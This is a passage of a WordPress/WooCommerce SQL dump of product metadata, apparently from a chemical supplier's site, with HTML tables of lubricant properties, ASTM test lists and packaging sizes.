INSERT INTO `wp_postmeta` VALUES (10835, 1001, '719_default_editor', '<ul>\r\n 	<li>ASTM D2266</li>\r\n 	<li>ASTM D2783</li>\r\n 	<li>ASTM D2596</li>\r\n 	<li>ASTM D1743</li>\r\n 	<li>ASTM B117</li>\r\n 	<li>ASTM D3233</li>\r\n 	<li>EMCOR</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (10836, 1001, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="104"><strong>Syringe</strong></td>\r\n<td style="text-align: center;" width="104"><strong>Dab-O-Matic</strong></td>\r\n<td style="text-align: center;" width="104"><strong>Needle Nose Bottle</strong></td>\r\n<td style="text-align: center;" width="104"><strong>Jar</strong></td>\r\n<td style="text-align: center;" width="104"><strong>Bottle</strong></td>\r\n<td width="104">\r\n<p style="text-align: center;"><strong>Jug</strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="104">\r\n<p style="text-align: center;">.5 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="104">1 oz.</td>\r\n<td style="text-align: center;" width="104">1 oz.</td>\r\n<td style="text-align: center;" width="104">.5 kg</td>\r\n<td style="text-align: center;" width="104">1 kg</td>\r\n<td style="text-align: center;" width="104">5 kg</td>\r\n</tr>\r\n<tr>\r\n<td width="104">\r\n<p style="text-align: center;">1 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="104">2 oz.</td>\r\n<td style="text-align: center;" width="104">2 oz.</td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td width="104">\r\n<p style="text-align: center;">20 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="104">\r\n<p style="text-align: center;">2 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="104">-</td>\r\n<td width="104">\r\n<p style="text-align: center;">-</p>\r\n</td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="104">-</td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (10837, 1001, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (10838, 1001, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10839, 1001, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10840, 1001, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (10841, 1001, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10842, 1001, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (10843, 1001, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (10844, 1001, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (10845, 1001, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (10846, 1001, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (10847, 1001, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (10848, 1001, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (10849, 1001, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (10850, 1001, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (10851, 1001, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (10852, 1001, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (10853, 1001, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10854, 1001, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10855, 1001, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (10856, 1001, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (10857, 1001, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (10858, 1001, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (10859, 1001, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10860, 1001, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10861, 1001, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (10862, 1001, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (10863, 1001, '_product_image_gallery', '385,386,387,388'); 
INSERT INTO `wp_postmeta` VALUES (10892, 994, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (10893, 994, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (10894, 994, '312_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (10895, 994, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (10896, 994, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (10897, 994, '318_custom_list_file', 'a:2:{s:32:"e33bb178e920693a0d63bd6393cd5ae2";a:3:{s:4:"name";s:10:"EPON 58034";s:4:"file";s:70:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/58034.pdf";s:4:"desc";s:14:"EPON 58034 TDS";}s:32:"ff92899c6252b7533008f499204b4077";a:3:{s:4:"name";s:16:"Product Overview";s:4:"file";s:90:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/curing-agent-overview-new.pdf";s:4:"desc";s:16:"Product Overview";}}'); 
INSERT INTO `wp_postmeta` VALUES (10898, 994, '317_default_editor', 'Quart, Gallon, 5 Gallon, 55 Gallon'); 
INSERT INTO `wp_postmeta` VALUES (10899, 994, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (10900, 994, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (10901, 994, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10902, 994, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10903, 994, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (10904, 994, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10905, 994, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (10906, 994, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (10907, 994, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (10908, 994, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (10909, 994, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (10910, 994, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (10911, 994, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (10912, 994, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (10913, 994, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (10914, 994, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (10915, 994, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (10916, 994, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (10917, 994, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10918, 994, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10919, 994, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (10920, 994, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (10921, 994, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (10922, 994, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (10923, 994, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10924, 994, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10925, 994, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (10926, 994, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (10927, 994, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (10928, 1001, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (10929, 1001, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (10930, 1002, '_edit_lock', '1474296381:2'); 
INSERT INTO `wp_postmeta` VALUES (10931, 1002, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (10932, 1002, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (10933, 1002, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (10934, 1002, '312_default_editor', '<table width="1573">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" colspan="9" width="1573"><strong>XP Properties</strong></td>\r\n</tr>\r\n<tr>\r\n<td><strong>Oil</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A0</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A1</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A2</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A3</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A4</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A5</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A6</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A7</strong></td>\r\n</tr>\r\n<tr>\r\n<td><strong>Grease</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A0</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A1</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A2</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A3</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A4</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A5</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A6</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A7</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><strong>ISO Grade of Base Oil</strong></td>\r\n<td style="text-align: center;">5</td>\r\n<td style="text-align: center;">7</td>\r\n<td style="text-align: center;">15</td>\r\n<td style="text-align: center;">32</td>\r\n<td style="text-align: center;">68</td>\r\n<td style="text-align: center;">150</td>\r\n<td style="text-align: center;">220</td>\r\n<td style="text-align: center;">460</td>\r\n</tr>\r\n<tr>\r\n<td><strong>Temperature Range °C</strong></td>\r\n<td style="text-align: center;">-70-66</td>\r\n<td style="text-align: center;">-70-104</td>\r\n<td style="text-align: center;">63-132</td>\r\n<td style="text-align: center;">60-154</td>\r\n<td style="text-align: center;">-51-179</td>\r\n<td style="text-align: center;">-36-182</td>\r\n<td style="text-align: center;">-36-182</td>\r\n<td style="text-align: center;">-30-182</td>\r\n</tr>\r\n<tr>\r\n<td><strong>Oil Viscosity, cSt</strong></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>20°C</td>\r\n<td style="text-align: center;">7</td>\r\n<td style="text-align: center;">16</td>\r\n<td style="text-align: center;">36</td>\r\n<td style="text-align: center;">80</td>\r\n<td style="text-align: center;">180</td>\r\n<td style="text-align: center;">550</td>\r\n<td style="text-align: center;">810</td>\r\n<td style="text-align: center;">1600</td>\r\n</tr>\r\n<tr>\r\n<td>40°C</td>\r\n<td style="text-align: center;">4</td>\r\n<td style="text-align: center;">8</td>\r\n<td style="text-align: center;">15</td>\r\n<td style="text-align: center;">30</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">240</td>\r\n<td style="text-align: center;">440</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">100°C</td>\r\n<td style="text-align: center;">-</td>\r\n<td style="text-align: center;">2</td>\r\n<td style="text-align: center;">3</td>\r\n<td style="text-align: center;">5</td>\r\n<td style="text-align: center;">9</td>\r\n<td style="text-align: center;">18</td>\r\n<td style="text-align: center;">25</td>\r\n<td style="text-align: center;">42</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><strong>Oil Viscosity Index</strong></td>\r\n<td style="text-align: center;">-</td>\r\n<td style="text-align: center;">-</td>\r\n<td style="text-align: center;">59</td>\r\n<td style="text-align: center;">121</td>\r\n<td style="text-align: center;">124</td>\r\n<td style="text-align: center;">134</td>\r\n<td style="text-align: center;">134</td>\r\n<td style="text-align: center;">155</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><strong>Food Contact Approval</strong></td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">XP 1A5 Only</td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">None</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (10935, 1002, '716_default_editor', '<ul>\r\n 	<li>Bearings</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (10936, 1002, '719_default_editor', '<ul>\r\n 	<li>ASTM D2266</li>\r\n 	<li>ASTM D2783</li>\r\n 	<li>ASTM D2596</li>\r\n 	<li>ASTM D1743</li>\r\n 	<li>ASTM B117</li>\r\n 	<li>ASTM D3233</li>\r\n 	<li>EMCOR</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (10937, 1002, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="104"><strong>Syringe</strong></td>\r\n<td style="text-align: center;" width="104"><strong>Dab-O-Matic</strong></td>\r\n<td style="text-align: center;" width="104"><strong>Needle Nose Bottle</strong></td>\r\n<td style="text-align: center;" width="104"><strong>Jar</strong></td>\r\n<td style="text-align: center;" width="104"><strong>Bottle</strong></td>\r\n<td width="104">\r\n<p style="text-align: center;"><strong>Jug</strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="104">\r\n<p style="text-align: center;">.5 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="104">1 oz.</td>\r\n<td style="text-align: center;" width="104">1 oz.</td>\r\n<td style="text-align: center;" width="104">.5 kg</td>\r\n<td style="text-align: center;" width="104">1 kg</td>\r\n<td style="text-align: center;" width="104">5 kg</td>\r\n</tr>\r\n<tr>\r\n<td width="104">\r\n<p style="text-align: center;">1 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="104">2 oz.</td>\r\n<td style="text-align: center;" width="104">2 oz.</td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td width="104">\r\n<p style="text-align: center;">20 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="104">\r\n<p style="text-align: center;">2 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="104">-</td>\r\n<td width="104">\r\n<p style="text-align: center;">-</p>\r\n</td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="104">-</td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (10938, 1002, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (10939, 1002, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10940, 1002, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10941, 1002, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (10942, 1002, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10943, 1002, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (10944, 1002, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (10945, 1002, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (10946, 1002, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (10947, 1002, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (10948, 1002, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (10949, 1002, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (10950, 1002, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (10951, 1002, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (10952, 1002, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (10953, 1002, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (10954, 1002, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10955, 1002, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10956, 1002, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (10957, 1002, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (10958, 1002, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (10959, 1002, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (10960, 1002, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10961, 1002, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10962, 1002, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (10963, 1002, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (10964, 1002, '_product_image_gallery', '378,377,375,381'); 
INSERT INTO `wp_postmeta` VALUES (10993, 1002, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (10994, 1002, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (11401, 1009, '_edit_lock', '1474296576:2'); 
INSERT INTO `wp_postmeta` VALUES (11402, 1009, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (11403, 1009, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (11404, 1009, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (11405, 1009, '312_default_editor', '<table width="1573">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" colspan="9" width="1573"><strong>XP Properties</strong></td>\r\n</tr>\r\n<tr>\r\n<td><strong>Oil</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A0</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A1</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A2</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A3</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A4</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A5</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A6</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A7</strong></td>\r\n</tr>\r\n<tr>\r\n<td><strong>Grease</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A0</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A1</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A2</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A3</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A4</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A5</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A6</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A7</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><strong>ISO Grade of Base Oil</strong></td>\r\n<td style="text-align: center;">5</td>\r\n<td style="text-align: center;">7</td>\r\n<td style="text-align: center;">15</td>\r\n<td style="text-align: center;">32</td>\r\n<td style="text-align: center;">68</td>\r\n<td style="text-align: center;">150</td>\r\n<td style="text-align: center;">220</td>\r\n<td style="text-align: center;">460</td>\r\n</tr>\r\n<tr>\r\n<td><strong>Temperature Range °C</strong></td>\r\n<td style="text-align: center;">-70-66</td>\r\n<td style="text-align: center;">-70-104</td>\r\n<td style="text-align: center;">63-132</td>\r\n<td style="text-align: center;">60-154</td>\r\n<td style="text-align: center;">-51-179</td>\r\n<td style="text-align: center;">-36-182</td>\r\n<td style="text-align: center;">-36-182</td>\r\n<td style="text-align: center;">-30-182</td>\r\n</tr>\r\n<tr>\r\n<td><strong>Oil Viscosity, cSt</strong></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>20°C</td>\r\n<td style="text-align: center;">7</td>\r\n<td style="text-align: center;">16</td>\r\n<td style="text-align: center;">36</td>\r\n<td style="text-align: center;">80</td>\r\n<td style="text-align: center;">180</td>\r\n<td style="text-align: center;">550</td>\r\n<td style="text-align: center;">810</td>\r\n<td style="text-align: center;">1600</td>\r\n</tr>\r\n<tr>\r\n<td>40°C</td>\r\n<td style="text-align: center;">4</td>\r\n<td style="text-align: center;">8</td>\r\n<td style="text-align: center;">15</td>\r\n<td style="text-align: center;">30</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">240</td>\r\n<td style="text-align: center;">440</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">100°C</td>\r\n<td style="text-align: center;">-</td>\r\n<td style="text-align: center;">2</td>\r\n<td style="text-align: center;">3</td>\r\n<td style="text-align: center;">5</td>\r\n<td style="text-align: center;">9</td>\r\n<td style="text-align: center;">18</td>\r\n<td style="text-align: center;">25</td>\r\n<td style="text-align: center;">42</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><strong>Oil Viscosity Index</strong></td>\r\n<td style="text-align: center;">-</td>\r\n<td style="text-align: center;">-</td>\r\n<td style="text-align: center;">59</td>\r\n<td style="text-align: center;">121</td>\r\n<td style="text-align: center;">124</td>\r\n<td style="text-align: center;">134</td>\r\n<td style="text-align: center;">134</td>\r\n<td style="text-align: center;">155</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><strong>Food Contact Approval</strong></td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">XP 1A5 Only</td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">None</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (11406, 1009, '716_default_editor', '<ul>\r\n 	<li>Bearings</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (11407, 1009, '719_default_editor', '<ul>\r\n 	<li>ASTM D2266</li>\r\n 	<li>ASTM D2783</li>\r\n 	<li>ASTM D2596</li>\r\n 	<li>ASTM D1743</li>\r\n 	<li>ASTM B117</li>\r\n 	<li>ASTM D3233</li>\r\n 	<li>EMCOR</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (11408, 1009, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="104"><strong>Syringe</strong></td>\r\n<td style="text-align: center;" width="104"><strong>Dab-O-Matic</strong></td>\r\n<td style="text-align: center;" width="104"><strong>Needle Nose Bottle</strong></td>\r\n<td style="text-align: center;" width="104"><strong>Jar</strong></td>\r\n<td style="text-align: center;" width="104"><strong>Bottle</strong></td>\r\n<td width="104">\r\n<p style="text-align: center;"><strong>Jug</strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="104">\r\n<p style="text-align: center;">.5 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="104">1 oz.</td>\r\n<td style="text-align: center;" width="104">1 oz.</td>\r\n<td style="text-align: center;" width="104">.5 kg</td>\r\n<td style="text-align: center;" width="104">1 kg</td>\r\n<td style="text-align: center;" width="104">5 kg</td>\r\n</tr>\r\n<tr>\r\n<td width="104">\r\n<p style="text-align: center;">1 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="104">2 oz.</td>\r\n<td style="text-align: center;" width="104">2 oz.</td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td width="104">\r\n<p style="text-align: center;">20 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="104">\r\n<p style="text-align: center;">2 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="104">-</td>\r\n<td width="104">\r\n<p style="text-align: center;">-</p>\r\n</td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="104">-</td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (11409, 1009, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (11410, 1009, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (11411, 1009, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (11412, 1009, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (11413, 1009, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (11414, 1009, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (11415, 1009, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (11416, 1009, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (11417, 1009, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (11418, 1009, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (11419, 1009, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (11420, 1009, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (11421, 1009, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (11422, 1009, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (11423, 1009, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (11424, 1009, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (11425, 1009, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (11426, 1009, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (11427, 1009, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (11428, 1009, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (11429, 1009, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (11430, 1009, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (11431, 1009, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (11432, 1009, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (11433, 1009, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (11434, 1009, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (11435, 1009, '_product_image_gallery', '378,377,375,381'); 
INSERT INTO `wp_postmeta` VALUES (11464, 1009, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (11465, 1009, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (11466, 1010, '_edit_lock', '1474296842:2'); 
INSERT INTO `wp_postmeta` VALUES (11467, 1010, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (11468, 1010, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (11469, 1010, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (11470, 1010, '312_default_editor', '<table width="1573">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" colspan="9" width="1573"><strong>XP Properties</strong></td>\r\n</tr>\r\n<tr>\r\n<td><strong>Oil</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A0</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A1</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A2</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A3</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A4</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A5</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A6</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A7</strong></td>\r\n</tr>\r\n<tr>\r\n<td><strong>Grease</strong></td>\r\n<td style="text-align: center;"><strong>XP 